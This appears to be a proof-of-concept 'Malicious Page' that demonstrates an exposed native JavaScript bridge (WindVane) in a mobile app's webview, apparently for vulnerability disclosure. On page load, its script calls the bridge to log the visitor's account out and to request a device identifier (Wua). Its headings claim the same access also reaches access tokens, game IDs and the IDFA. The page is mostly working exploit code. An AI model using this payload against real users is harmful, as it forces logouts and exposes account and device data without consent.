<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap; 
            word-wrap: break-word; 
            overflow-wrap: break-word; 
        }

        .bold-and-larger {
            font-weight: bold; 
            font-size: 1.5em; 
        }

        .larger {
            font-weight: bold; 
            font-size: 1.2em; 
        }

    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="AccessToken"></p>
    <p style="font-size: 15px;" id="GameID"></p>
    <p style="font-size: 15px;" id="CurrentSong"></p>

    <p><span class="larger">Get Your Device Info:</span></p>
    <p style="font-size: 15px;" id="Wua"></p>
    <p style="font-size: 15px;" id="IDFA"></p>

    <p><span class="larger">Log out Your Account:</span></p>    
    Will log out your account:
    <p style="font-size: 15px;" id="LogOutText"></p>
    <input type="button" value="Log out" id="LogOutBtn" style="font-size: 20px; padding: 20px 25px;"/>
    <br><br><br><br><br><br>

    <script>
        
        window.__windvane__.onSuccess = function (reqId, response, boool){
            // console.log("[attacker]: " + "\n reqId: " + reqId + "\n response: " + JSON.stringify(response) + "\n bool: " + boool);
            if(reqId=="$0001"){
                document.getElementById("LogOutText").innerText = "Log out successfully"; 
            }



        }

        window.webkit.messageHandlers.WindVaneCallNative.postMessage({
            name: "aluWVJSBridge.logout",
            params: "{}",
            reqId: "$0001"
        });

        window.webkit.messageHandlers.WindVaneCallNative.postMessage({
            name: "aluWVJSBridge.getWua",
            params: "{}",
            reqId: "$0002"
        });


    </script>

</body>

</html>